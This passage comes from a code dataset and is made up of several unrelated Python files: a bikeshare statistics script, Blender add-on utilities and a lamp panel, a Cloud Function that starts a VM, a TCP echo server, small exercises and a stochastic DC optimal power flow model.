',popular_start_station)\n\n # display most commonly used end station\n popular_end_station = df['End Station'].mode()\n print('Most popular End Station : ',popular_end_station)\n\n # display most frequent combination of start station and end station trip\n df['Start_And_End_Station'] = df['Start Station'] + ' , ' + df['End Station']\n popular_start_and_end_station = df['Start_And_End_Station'].mode()\n print('Most Frequent trips are between : ',popular_start_and_end_station)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n########################### FUNCTION 5 #############################\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print('Total travel time in seconds : ',df['Trip Duration'].sum())\n print('Total travel time in minutes : ',int(df['Trip Duration'].sum()/60))\n\n # display mean travel time\n print('Average travel time in seconds : ',df['Trip Duration'].mean())\n print('Average travel time in minutes : ', int(df['Trip Duration'].mean()/60))\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n############################ FUNCTION 6 ################################\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('User Types : \\n')\n print(df['User Type'].value_counts())\n\n # Display counts of gender\n if 'Gender' in df.columns:\n print('\\nGender information : ')\n print('\\n',df['Gender'].value_counts())\n else:\n print(\" \\nGender information not available. \")\n\n # Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n print('\\nBirth date information : ')\n print('\\nEarliest year of birth : ',df['Birth Year'].min())\n print('Most recent year of birth : ',df['Birth Year'].max())\n print('Common year of birth : ',df['Birth Year'].mode())\n from datetime import date\n today = date.today()\n # creating an age column\n df['age'] = today.year - df['Birth Year']\n print('Most Common age of bike users : ',df['age'].mode())\n\n else:\n print(\"\\nBirth Year information not available.\")\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n############################### FUNCTION 7 ############################\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n print('Data for 5 bike users .')\n for a in range(5):\n print('\\n')\n print(df.iloc[a])\n\n # Displaying data for 5 more users\n b = 5\n c = 10\n while True:\n word = input(\"\\nPlease enter 'Y' if you would like to see data of 5 more bike users else N: \\n \").lower()\n if word == \"y\":\n for a in range(b, c):\n print('\\n')\n print(df.iloc[a])\n b = c\n c = c + 5\n\n elif word == \"n\":\n print(\"Finished.\")\n break\n\n else :\n print('Please enter y or n .')\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"210877327","text":"import os\nimport bpy\n\n\ndef project_files_path():\n ''' Consolidate the creation of the path to the project files'''\n\n filepath = os.path.dirname(bpy.data.filepath)\n filepath, dot, blend = bpy.data.filepath.rpartition(os.path.extsep)\n filepath = filepath + \"_files\"\n filepath = os.path.join(filepath, \"mcell\")\n return filepath\n\n\ndef preserve_selection_use_operator(operator, new_obj):\n \"\"\" Preserve current object selection state and use operator.\n\n It is not uncommon for Blender operators to make use of the current\n selection. This means you first have to save the current selection state,\n deselect everything, select the object you actually want to do the\n operation on, execute the operator, deselect that object, and finally\n reselect the original selection state. This sounds silly but can be quite\n useful. \"\"\"\n\n object_list = bpy.context.scene.objects\n selected_objs = [obj for obj in object_list if obj.select]\n # Deselect everything currently selected, so the operator doesn't act on it\n for obj in selected_objs:\n obj.select = False\n # Select the object we actually want the operator to act on, use it, and\n # deselect.\n new_obj.select = True\n operator()\n new_obj.select = False\n # It's annoying if operators change things they shouldn't, so let's restore\n # the originally select objects.\n for obj in selected_objs:\n obj.select = True\n","sub_path":"All_In_One/addons/cellblender/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488044887","text":"import bpy\n\n\"\"\"\nFloatProperty = bpy.types.Lamp.FloatProperty\nIntProperty = bpy.types.Lamp.IntProperty\nBoolProperty = bpy.types.Lamp.BoolProperty\nCollectionProperty = bpy.types.Lamp.CollectionProperty\nEnumProperty = bpy.types.Lamp.EnumProperty\nFloatVectorProperty = bpy.types.Lamp.FloatVectorProperty\nStringProperty = bpy.types.Lamp.StringProperty\nIntVectorProperty = bpy.types.Lamp.IntVectorProperty\n\"\"\"\n\nbpy.types.Lamp.lamp_type = bpy.props.EnumProperty(attr=\"lamp_type\",\n\titems = (\n\t\t(\"Light Type\",\"Light Type\",\"\"),\n\t\t(\"Area\",\"Area\",\"\"),\n\t\t(\"Directional\",\"Directional\",\"\"),\n\t\t#(\"MeshLight\",\"MeshLight\",\"\"),\n\t\t(\"Point\",\"Point\",\"\"),\n\t\t(\"Sphere\",\"Sphere\",\"\"),\n\t\t(\"Spot\",\"Spot\",\"\"),\n\t\t(\"Sun\",\"Sun\",\"\"),\n\t\t(\"IES\",\"IES\",\"\"),\n),default=\"Sun\")\nbpy.types.Lamp.create_geometry = bpy.props.BoolProperty(attr=\"create_geometry\")\nbpy.types.Lamp.infinite = bpy.props.BoolProperty(attr=\"infinite\")\nbpy.types.Lamp.spot_soft_shadows = bpy.props.BoolProperty(attr=\"spot_soft_shadows\")\nbpy.types.Lamp.shadow_fuzzyness = bpy.props.FloatProperty(attr=\"shadow_fuzzyness\", default = 1.0)\nbpy.types.Lamp.photon_only = bpy.props.BoolProperty(attr=\"photon_only\")\nbpy.types.Lamp.angle = bpy.props.IntProperty(attr=\"angle\",\n\t\tmax = 80,\n\t\tmin = 0)\nbpy.types.Lamp.ies_file = bpy.props.StringProperty(attr=\"ies_file\",subtype = 'FILE_PATH')\nbpy.types.Lamp.yaf_samples = bpy.props.IntProperty(attr=\"yaf_samples\", default = 16)\nbpy.types.Lamp.ies_cone_angle = bpy.props.FloatProperty(attr=\"ies_cone_angle\", default = 10.0)\nbpy.types.Lamp.ies_soft_shadows = bpy.props.BoolProperty(attr=\"ies_soft_shadows\")\n\n\nclass YAF_PT_lamp(bpy.types.Panel):\n\n\tbl_label = 'Lamp'\n\tbl_space_type = 'PROPERTIES'\n\tbl_region_type = 'WINDOW'\n\tbl_context = 'data'\n\tCOMPAT_ENGINES =['YAFA_RENDER']\n\n\t@classmethod\n\tdef poll(self, context):\n\n\t\tengine = context.scene.render.engine\n\n\t\timport properties_data_lamp\n\n\t\tif (context.lamp and (engine in self.COMPAT_ENGINES) ) :\n\t\t\ttry :\n\t\t\t\tproperties_data_lamp.unregister()\n\t\t\texcept: \n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tproperties_data_lamp.register()\n\t\t\texcept: \n\t\t\t\tpass\n\t\treturn (context.lamp and (engine in self.COMPAT_ENGINES) ) \n\n\n\tdef draw(self, context):\n\n\t\tlayout = self.layout\n\t\tsplit = layout.split()\n\t\tcol = split.column()\n\n\t\tcol.prop(context.lamp,\"type\", text= \"Light Type\")\n\t\trow = layout.row()\n\t\tsplit = row.split()\n\t\tcol = row.column()\n\t\t\n\t\t#context.lamp.shadow_ray_samples = 16\n\n\t\tif context.lamp.type == 'AREA':\n\t\t\t\n\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\tif context.lamp.type != 'AREA':\n\t\t\t\tcontext.lamp.type = 'AREA'\n\t\t\tcol.prop(context.lamp,\"size\", text= \"SizeX\")\n\t\t\tcol.prop(context.lamp,\"size_y\", text= \"SizeY\")\n\t\t\tcol.prop(context.lamp,\"create_geometry\", text= \"Create Geometry\")\n\n\n\t\telif context.lamp.type == 'Directional':\n\t\t\tif context.lamp.type != 'SUN':\n\t\t\t\tcontext.lamp.type = 'SUN'\n\t\t\tcol.prop(context.lamp,\"shadow_soft_size\", text= \"Radius\")\n\t\t\tcol.prop(context.lamp,\"infinite\", text= \"Infinite\")\n\n\t\telif context.lamp.type == 'Sphere':\n\t\t\tif context.lamp.type != 'POINT':\n\t\t\t\tcontext.lamp.type = 'POINT'\n\t\t\tcol.prop(context.lamp,\"shadow_soft_size\", text= \"Radius\")\n\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\tcol.prop(context.lamp,\"create_geometry\", text= \"Create Geometry\")\n\n\n\t\telif context.lamp.type == 'SPOT':\n\t\t\t\n\t\t\tif context.lamp.type != 'SPOT':\n\t\t\t\tcontext.lamp.type = 'SPOT'\n\t\t\t\n\t\t\tcol.prop(context.lamp,\"spot_size\", text= \"Cone Angle\")\n\t\t\tcol.prop(context.lamp,\"spot_soft_shadows\", text= \"Soft Shadow\")\n\t\t\t\n\t\t\tif context.lamp.spot_soft_shadows:\n\t\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\t\tcol.prop(context.lamp,\"shadow_fuzzyness\", text= \"Shadow Fuzzyness\")\n\t\t\tcol.prop(context.lamp,\"spot_blend\", text= \"Blend\")\n\t\t\tcol.prop(context.lamp,\"distance\", text= \"Distance\")\n\t\t\tcol.prop(context.lamp,\"photon_only\", text= \"Photon Only\")\n\t\t\t\n\t\t\t\n\t\telif context.lamp.type == 'SUN':\n\t\t\t\n\t\t\tif context.lamp.type != 'SUN':\n\t\t\t\tcontext.lamp.type = 'SUN'\n\t\t\tcol.prop(context.lamp,\"angle\", text= \"Angle\")\n\t\t\tcol.prop(context.lamp,\"yaf_samples\", text= \"Samples\")\n\t\t\n\t\telif context.lamp.type == 'POINT':\n\t\t\t\n\t\t\tif context.lamp.type != 'POINT':\n\t\t\t\tcontext.lamp.type = 'POINT'\n\t\t\t\n\t\t\n\t\telif context.lamp.type == 'IES':\n\t\t\tcol.prop(context.lamp,\"ies_file\",text = \"IES File\")\n\t\t\tif context.lamp.ies_soft_shadows:\n\t\t\t\tcol.prop(context.lamp,\"yaf_samples\",text = \"IES Samples\")\n\t\t\tcol.prop(context.lamp,\"ies_cone_angle\",text = \"IES Cone Angle\")\n\t\t\tcol.prop(context.lamp,\"ies_soft_shadows\",text = \"IES Soft Shadows\")\n\n\n\n\n\t\tcol.prop(context.lamp,\"color\", text= \"Color\")\n\t\tcol.prop(context.lamp,\"energy\", text= \"Power\")\n\n\nfrom properties_data_lamp import DATA_PT_preview\nfrom properties_data_lamp import DATA_PT_context_lamp\n\nclasses = [\n\tYAF_PT_lamp,\n]\n\ndef register():\n\tYAF_PT_lamp.prepend( DATA_PT_preview.draw )\n\tYAF_PT_lamp.prepend( DATA_PT_context_lamp.draw )\n\tregister = bpy.types.register\n\tfor cls in classes:\n\t\tregister(cls)\n\n\ndef unregister():\n\tbpy.types.YAF_PT_lamp.remove( DATA_PT_preview.draw )\n\tbpy.types.YAF_PT_lamp.remove( DATA_PT_context_lamp.draw )\n\tunregister = bpy.types.unregister\n\tfor cls in classes:\n\t\tunregister(cls)\n\n\nif __name__ == \"__main__\":\n\tregister()\n","sub_path":"ui/yaf_light.py","file_name":"yaf_light.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389354868","text":"from googleapiclient import discovery\n\ndef start_server_pubsub(event, context):\n \n service = discovery.build('compute', 'v1')\n print('VM Instance starting')\n\n # Project ID for this request.\n project = 'minecraft-xxxxxx' \n\n # The name of the zone for this request.\n zone = 'australia-southeast1-a' \n\n # Name of the instance resource to start.\n instance = 'mc-server'\n\n request = service.instances().start(project=project, zone=zone, instance=instance)\n response = request.execute()\n\n print('VM Instance started')\n","sub_path":"compute/cloud_functions/start_compute/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322475474","text":"# -*- coding:utf-8 -*-\n# create_time: 2019/2/28 15:10\n# __author__ = 'brad'\n\nimport socket\nfrom time import ctime\n\nHOST = ''\nPORT = 25555\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\ntcp_server_socket = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)\ntcp_server_socket.bind(ADDR) # 这就是绑定服务端的socket了\ntcp_server_socket.listen(5) # 启动监听,参数代表最多可以监听多少个客户端\n\nwhile True:\n print('等待连接')\n tcp_client_socket, addr = tcp_server_socket.accept() # 这就是在等待的一步,程序运行到这一步会等待客户端的连接。连接后就可以放回客户端的socket和地址\n print('连接来自:{}'.format(addr))\n\n while True:\n data = tcp_client_socket.recv(BUFSIZ)\n print(data.decode('utf-8'))\n print(data)\n if not data:\n break\n tcp_client_socket.send(bytes(ctime() + ': ', 'utf-8') + data) # 注意这里一定要用字节的形式,bypes()是个很好用的内置函数,另外,str的内置方法encode()和decode()也是很好的转圜方法。还有也可以在ascii字符串的前面加b,也可以转字符串。\n\n tcp_client_socket.close()\n\ntcp_server_socket.close()\n","sub_path":"socket_learn/tcp_inet6_server.py","file_name":"tcp_inet6_server.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"108976668","text":"# 1\n# 1 1\n# 1 2 1\n# 1 3 3 1\n# 1 4 6 4 1\n\n# f(row, 0) = 1\n# f(row, column) = 1 , if index of row is index of column\n# f(row,column) = f(row -1, column - 1) + f(row -1, column)\n\ndef pascalTriangle():\n rows, cols = (5, 5) \n arr = [[0 for i in range(cols)] for j in range(rows)] \n \n \n for i in range(0, rows):\n arr[i][0] = 1\n\n for i in range(1, rows):\n for j in range(0, cols):\n if i == j:\n arr[i][j] = 1\n else:\n arr[i][j] = arr[i-1][j-1] + arr[i-1][j]\n \n results = []\n for sublist in arr:\n result = []\n for idx in range(len(sublist)):\n if sublist[idx] != 0:\n result.append(sublist[idx])\n results.append(result)\n print (results)\n\n # for i in range(0,5):\n # for j in range(0,i):\n # print (arr[i][j], end = '')\n # print (\",\", end = '')\n # print ()\n\n \n\nif __name__ == \"__main__\":\n pascalTriangle()","sub_path":"Leetcode/dp/pascalTriangle.py","file_name":"pascalTriangle.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644453342","text":"# Practice Project - Chapter 3 - Collatz Sequence\n\ndef collatz(n):\n if (n % 2) == 0:\n number = n // 2\n return number\n elif (n % 2) == 1:\n number = 3 * n + 1\n return number\n\ndef get_result():\n try:\n in_n = int(input('Enter number: '))\n while in_n != 1:\n in_n = collatz(in_n)\n print(in_n)\n except ValueError:\n print('Please enter a number!')\nget_result()","sub_path":"part_1/03-functions/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"612434502","text":"#!/usr/bin/env python2\nimport csv\nfrom math import pow\n\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pylab as plt\n\n\nTEST_DATA_3D = \"data/pts3d.dat\"\nTEST_DATA_1 = \"data/pts1.dat\"\nTEST_DATA_2 = \"data/pts2.dat\"\n\n\ndef load_2d_data(fp, skip_header=True):\n csv_file = open(fp, 'r')\n csv_reader = csv.reader(csv_file)\n if skip_header:\n next(csv_reader, None)\n\n data = {\n \"x\": [], \"y\": [],\n }\n for line in csv_reader:\n data[\"x\"].append(float(line[0]))\n data[\"y\"].append(float(line[1]))\n\n return data\n\n\ndef load_3d_data(fp, skip_header=True):\n csv_file = open(fp, 'r')\n csv_reader = csv.reader(csv_file)\n if skip_header:\n next(csv_reader, None)\n\n data = {\n \"x\": [], \"y\": [], \"z\": [],\n }\n for line in csv_reader:\n data[\"x\"].append(float(line[0]))\n data[\"y\"].append(float(line[1]))\n data[\"z\"].append(float(line[2]))\n\n return data\n\n\ndef rotation_matrix(q):\n R_00 = 1.0 - 2.0 * pow(q[1], 2) - 2.0 * pow(q[2], 2)\n R_01 = 2.0 * q[0] * q[1] + 2.0 * q[3] * q[2]\n R_02 = 2.0 * q[0] * q[2] - 2.0 * q[3] * q[1]\n\n R_10 = 2.0 * q[0] * q[1] - 2.0 * q[3] * q[2]\n R_11 = 1.0 - 2.0 * pow(q[0], 2) - 2.0 * pow(q[2], 2)\n R_12 = 2.0 * q[1] * q[2] + 2.0 * q[3] * q[2]\n\n R_20 = 2.0 * q[0] * q[2] - 2.0 * q[3] * q[1]\n R_21 = 2.0 * q[1] * q[2] - 2.0 * q[3] * q[0]\n R_22 = 1.0 - 2.0 * pow(q[0], 2) - 2.0 * pow(q[1], 2)\n\n R = [\n [R_00, R_01, R_02],\n [R_10, R_11, R_12],\n [R_20, R_21, R_22]\n ]\n\n return np.matrix(R)\n\n\ndef plot_2dpts(q, t, pts, ax, color):\n pts[\"z\"] = []\n R = rotation_matrix(q)\n t = np.array(t)\n\n # transform point\n for i in range(len(pts[\"x\"])):\n pt = np.array([pts[\"x\"][i], pts[\"y\"][i], 0.0])\n pt = R.dot(pt + t).tolist()[0]\n\n pts[\"x\"][i] = pt[0]\n pts[\"y\"][i] = pt[1]\n pts[\"z\"].append(pt[2])\n\n # plot\n ax.scatter(pts[\"x\"], pts[\"y\"], pts[\"z\"], c=color)\n\n\ndef plot(pts3d, pts1, pts2):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n\n # plot 3d points\n ax.scatter(pts3d[\"x\"], pts3d[\"y\"], pts3d[\"z\"], c=\"r\")\n\n # plot points 1\n q = [0.0, 0.0, 0.0, 1.0]\n t = [0.0, 0.0, 0.0]\n plot_2dpts(q, t, pts1, ax, \"g\")\n\n # plot points 2\n q = [0.0, -0.174, 0.0, 0.985]\n t = [1.0, 0.0, 0.0]\n plot_2dpts(q, t, pts2, ax, \"b\")\n\n for i in range(len(pts3d[\"x\"])):\n ax.plot(\n [pts3d[\"x\"][i], pts1[\"x\"][i]],\n [pts3d[\"y\"][i], pts1[\"y\"][i]],\n [pts3d[\"z\"][i], pts1[\"z\"][i]],\n c=\"g\"\n )\n\n for i in range(len(pts3d[\"x\"])):\n ax.plot(\n [pts3d[\"x\"][i], pts2[\"x\"][i]],\n [pts3d[\"y\"][i], pts2[\"y\"][i]],\n [pts3d[\"z\"][i], pts2[\"z\"][i]],\n c=\"b\"\n )\n\n # plot labels\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n pts3d = load_3d_data(TEST_DATA_3D)\n pts1 = load_2d_data(TEST_DATA_1)\n pts2 = load_2d_data(TEST_DATA_2)\n\n plot(pts3d, pts1, pts2)\n","sub_path":"scripts/plot/plot_3d_data.py","file_name":"plot_3d_data.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29903366","text":"#*****************************************************#\n# This file is part of GRIDOPT. #\n# #\n# Copyright (c) 2015-2016, Tomas Tinoco De Rubira. #\n# #\n# GRIDOPT is released under the BSD 2-clause license. #\n#*****************************************************#\n\nfrom __future__ import print_function\nimport csv\nimport time\nimport pfnet as pf\nimport numpy as np\nfrom .utils import ApplyFunc\nfrom numpy.linalg import norm\nfrom gridopt.power_flow import new_method\nfrom optalg.lin_solver import new_linsolver\nfrom optalg.opt_solver.opt_solver_error import *\nfrom optalg.stoch_solver import StochProblemMS\nfrom optalg.opt_solver import OptSolverIQP,QuadProblem\nfrom scipy.sparse import triu,tril,bmat,coo_matrix,eye,block_diag,spdiags\n\nclass MS_DCOPF_Problem(StochProblemMS):\n \n # Parameters\n parameters = {'cost_factor' : 1e1, # factor for determining fast gen cost\n 'infinity' : 1e4, # infinity\n 'flow_factor' : 1.0, # factor for relaxing thermal limits\n 'p_ramp_max' : 0.01, # factor for constructing ramping limits for slow gens (fraction of pmax)\n 'r_ramp_max' : 0.10, # factor for constructing ramping limits for renewables (fraction of rmax)\n 'r_ramp_freq' : 0.10, # renewable ramping frequency \n 'r_eps' : 1e-3, # smallest renewable injection\n 'num_samples' : 1000, # number of samples\n 'draw': False, # drawing flag\n 'name': ''} # name\n\n def __init__(self,net,forecast,parameters={}):\n \"\"\"\n Class constructor.\n \n Parameters\n ----------\n net : PFNET Network\n forecast : dict\n parameters : dict\n \"\"\"\n \n # Check forecast\n assert('vargen' in forecast)\n assert('load' in forecast)\n assert('size' in forecast)\n assert(len(forecast['load']) == net.num_loads)\n assert(len(forecast['vargen']) == net.num_vargens)\n assert(set([len(v) for v in list(forecast['load'].values())]) == set([forecast['size']]))\n assert(set([len(v) for v in list(forecast['vargen'].values())]) == set([forecast['size']]))\n \n # Parameters\n self.parameters = MS_DCOPF_Problem.parameters.copy()\n self.set_parameters(parameters)\n \n # Save info\n self.T = forecast['size']\n self.corr_value = net.vargen_corr_value\n self.corr_radius = net.vargen_corr_radius\n\n # Branch flow limits\n for br in net.branches:\n if br.ratingA == 0.:\n br.ratingA = self.parameters['infinity']\n else:\n br.ratingA *= self.parameters['flow_factor']\n\n # Initial state\n for load in net.loads:\n load.P = forecast['load'][load.index][0]\n for vargen in net.var_generators:\n vargen.P = forecast['vargen'][vargen.index][0]\n dcopf = new_method('DCOPF')\n dcopf.set_parameters({'quiet': True, 'vargen_curtailment': True})\n dcopf.solve(net)\n assert(dcopf.results['status'] == 'solved')\n dcopf.update_network(net)\n \n # Counters\n num_w = net.num_buses-net.get_num_slack_buses() # voltage angles\n num_p = net.get_num_P_adjust_gens() # adjustable generators\n num_r = net.num_vargens # renewable generators\n num_l = net.num_loads # loads\n num_bus = net.num_buses # buses\n num_br = net.num_branches # branches\n \n # Variables\n net.clear_flags()\n net.set_flags('bus',\n 'variable',\n 'not slack',\n 'voltage angle')\n net.set_flags('generator',\n 'variable',\n 'adjustable active power',\n 'active power')\n net.set_flags('load',\n 'variable',\n 'any',\n 'active power')\n net.set_flags('variable generator',\n 'variable',\n 'any',\n 'active power')\n\n # Current values\n x = net.get_var_values()\n \n # Projections\n Pw = net.get_var_projection('bus','voltage angle')\n Pp = net.get_var_projection('generator','active power')\n Pl = net.get_var_projection('load','active power')\n Pr = net.get_var_projection('variable generator','active power')\n assert(Pw.shape == (num_w,net.num_vars))\n assert(Pp.shape == (num_p,net.num_vars))\n assert(Pl.shape == (num_l,net.num_vars))\n assert(Pr.shape == (num_r,net.num_vars))\n\n # Power flow equations\n pf_eq = pf.Constraint('DC power balance',net)\n pf_eq.analyze()\n pf_eq.eval(x)\n A = pf_eq.A.copy()\n b = pf_eq.b.copy()\n\n # Branch flow limits\n fl_lim = pf.Constraint('DC branch flow limits',net)\n fl_lim.analyze()\n fl_lim.eval(x)\n G = fl_lim.G.copy()\n hl = fl_lim.l.copy()\n hu = fl_lim.u.copy()\n assert(np.all(hl < hu))\n \n # Generation cost\n cost = pf.Function('generation cost',1.,net)\n cost.analyze()\n cost.eval(x)\n H = (cost.Hphi + cost.Hphi.T - triu(cost.Hphi))/net.base_power # symmetric, scaled\n g = cost.gphi/net.base_power - H*x # scaled\n\n # Bounds\n l = net.get_var_values('lower limits')\n u = net.get_var_values('upper limits')\n assert(np.all(Pw*l < Pw*u))\n assert(np.all(Pp*l < Pp*u))\n assert(np.all(Pl*l <= Pl*u))\n assert(np.all(Pr*l < Pr*u))\n\n # Renewable covariance\n from scikits.sparse.cholmod import cholesky\n r_cov = Pr*net.create_vargen_P_sigma(net.vargen_corr_radius,net.vargen_corr_value)*Pr.T\n r_cov = (r_cov+r_cov.T-triu(r_cov)).tocsc()\n factor = cholesky(r_cov)\n L,D = factor.L_D()\n P = factor.P()\n PT = coo_matrix((np.ones(P.size),(P,np.arange(P.size))),shape=D.shape)\n P = P.T\n D = D.tocoo()\n Dh = coo_matrix((np.sqrt(D.data),(D.row,D.col)),shape=D.shape)\n L = PT*L*Dh\n\n # Problem data\n self.num_p = num_p\n self.num_q = num_p\n self.num_w = num_w\n self.num_s = num_r\n self.num_r = num_r\n self.num_y = num_p\n self.num_z = num_br\n self.num_l = num_l\n self.num_bus = num_bus\n self.num_br = num_br\n self.num_x = self.num_p+self.num_q+self.num_w+self.num_s+self.num_y+self.num_z # stage vars\n\n self.p_max = Pp*u\n self.p_min = Pp*l\n self.p_prev = Pp*x\n \n self.q_max = Pp*u\n self.q_min = Pp*l\n \n self.w_max = self.parameters['infinity']*np.ones(self.num_w)\n self.w_min = -self.parameters['infinity']*np.ones(self.num_w)\n\n self.r_max = Pr*u\n\n self.z_max = hu\n self.z_min = hl\n\n dp = np.maximum(self.p_max-self.p_min,5e-2)\n self.y_max = self.parameters['p_ramp_max']*dp\n self.y_min = -self.parameters['p_ramp_max']*dp\n\n self.Hp = (Pp*H*Pp.T).tocoo()\n self.gp = Pp*g\n self.Hq = self.Hp*self.parameters['cost_factor']\n self.gq = self.gp*self.parameters['cost_factor']\n\n self.G = A*Pp.T\n self.C = A*Pp.T\n self.R = A*Pr.T\n self.A = -A*Pw.T\n self.J = G*Pw.T\n self.D = -A*Pl.T\n self.b = b\n \n self.Pp = Pp\n self.Pw = Pw\n self.Pr = Pr\n\n self.r_cov = r_cov\n self.L_cov = L\n self.L_sca = [np.sqrt(t/(self.T-1.)) for t in range(self.T)] # variance grows linearly\n\n self.Ip = eye(self.num_p,format='coo')\n self.Iy = eye(self.num_y,format='coo')\n self.Iz = eye(self.num_z,format='coo')\n\n self.Ow = coo_matrix((self.num_w,self.num_w))\n self.Os = coo_matrix((self.num_s,self.num_s))\n self.Oy = coo_matrix((self.num_y,self.num_y))\n self.Oz = coo_matrix((self.num_z,self.num_z))\n\n self.oq = np.zeros(self.num_q)\n self.ow = np.zeros(self.num_w)\n self.os = np.zeros(self.num_s)\n self.oy = np.zeros(self.num_y)\n self.oz = np.zeros(self.num_z)\n\n self.x_prev = np.hstack((self.p_prev,self.oq,self.ow,self.os,self.oy,self.oz)) # stage vars\n\n self.d_forecast = []\n self.r_forecast = []\n for t in range(self.T):\n for load in net.loads:\n load.P = forecast['load'][load.index][t]\n for gen in net.var_generators:\n gen.P = forecast['vargen'][gen.index][t]\n x = net.get_var_values()\n self.d_forecast.append(Pl*x)\n self.r_forecast.append(Pr*x)\n\n # Check problem data\n assert(net.num_vars == num_w+num_p+num_r+num_l)\n assert(self.num_p == self.num_q == self.num_y)\n assert(self.num_z == self.num_br)\n assert(np.all(self.p_min == 0.))\n assert(np.all(self.p_min < self.p_max))\n assert(np.all(self.q_min < self.q_max))\n assert(np.all(self.p_min == self.q_min))\n assert(np.all(self.p_max == self.q_max))\n assert(np.all(self.w_min < self.w_max))\n assert(np.all(self.z_min < self.z_max))\n assert(np.all(self.y_min < self.y_max))\n assert(np.all(self.Hp.row == self.Hp.col))\n assert(np.all(self.Hp.data > 0))\n assert(np.all(self.Hq.row == self.Hq.col))\n assert(np.all(self.Hq.data > 0))\n assert(np.all(self.Hq.data == self.parameters['cost_factor']*self.Hp.data))\n assert(np.all(self.gp >= 0))\n assert(np.all(self.gq == self.gp*self.parameters['cost_factor']))\n assert(self.gp.shape == self.gq.shape)\n assert(self.D.shape == (self.num_bus,self.num_l))\n assert(self.G.shape == (self.num_bus,self.num_p))\n assert(self.C.shape == (self.num_bus,self.num_q))\n assert(self.R.shape == (self.num_bus,self.num_s))\n assert(self.A.shape == (self.num_bus,self.num_w))\n assert(self.J.shape == (self.num_br,self.num_w))\n assert(self.b.shape == (self.num_bus,))\n assert(all([d.shape == (self.num_l,) for d in self.d_forecast]))\n assert(all([r.shape == (self.num_r,) for r in self.r_forecast]))\n assert(all([np.all(r < self.r_max) for r in self.r_forecast]))\n assert(all([np.all(r >= 0) for r in self.r_forecast]))\n assert(np.all(D.row == D.col))\n assert(np.all(Dh.row == Dh.col))\n assert(np.all(D.data > 0))\n assert(np.all(Dh.data > 0))\n assert(self.r_cov.shape == (self.num_r,self.num_r))\n for i in range(10):\n z = np.random.randn(self.num_r)\n assert(norm(self.r_cov*z-self.L_cov*self.L_cov.T*z) < 1e-10)\n\n # Construct base problems\n self.base_problem = []\n for t in range(self.T):\n self.base_problem.append(self.construct_base_problem(t))\n\n def construct_base_problem(self,t,tf=None):\n \"\"\"\n Constructs base problem for given time period.\n\n Parameters\n ----------\n t : int (initial stage)\n tf : int (end stage)\n\n Returns\n -------\n problem : QuadProblem\n \"\"\"\n\n if tf is None:\n tf = self.T-1\n \n assert(t >= 0)\n assert(t < self.T)\n assert(tf >= 0)\n assert(tf < self.T)\n assert(t <= tf)\n\n H_list = []\n g_list = []\n A_list = []\n b_list = []\n l_list = []\n u_list = []\n\n for i in range(tf-t+1):\n\n H = bmat([[self.Hp,None,None,None,None,None], # p\n [None,self.Hq,None,None,None,None], # q\n [None,None,self.Ow,None,None,None], # w\n [None,None,None,self.Os,None,None], # s\n [None,None,None,None,self.Oy,None], # y\n [None,None,None,None,None,self.Oz]], # z\n format='coo')\n\n g = np.hstack((self.gp, # p (add correction)\n self.gq, # q\n self.ow, # w\n self.os, # s\n self.oy, # y\n self.oz)) # z\n\n Arow1 = 6*(tf-t+1)*[None]\n Arow1[6*i:6*(i+1)] = [self.G,self.C,-self.A,self.R,None,None]\n \n Arow2 = 6*(tf-t+1)*[None]\n Arow2[6*i:6*(i+1)] = [self.Ip,None,None,None,-self.Iy,None]\n if i > 0:\n Arow2[6*(i-1)] = -self.Ip\n\n Arow3 = 6*(tf-t+1)*[None]\n Arow3[6*i:6*(i+1)] = [None,None,self.J,None,None,-self.Iz]\n\n H_list.append(H)\n 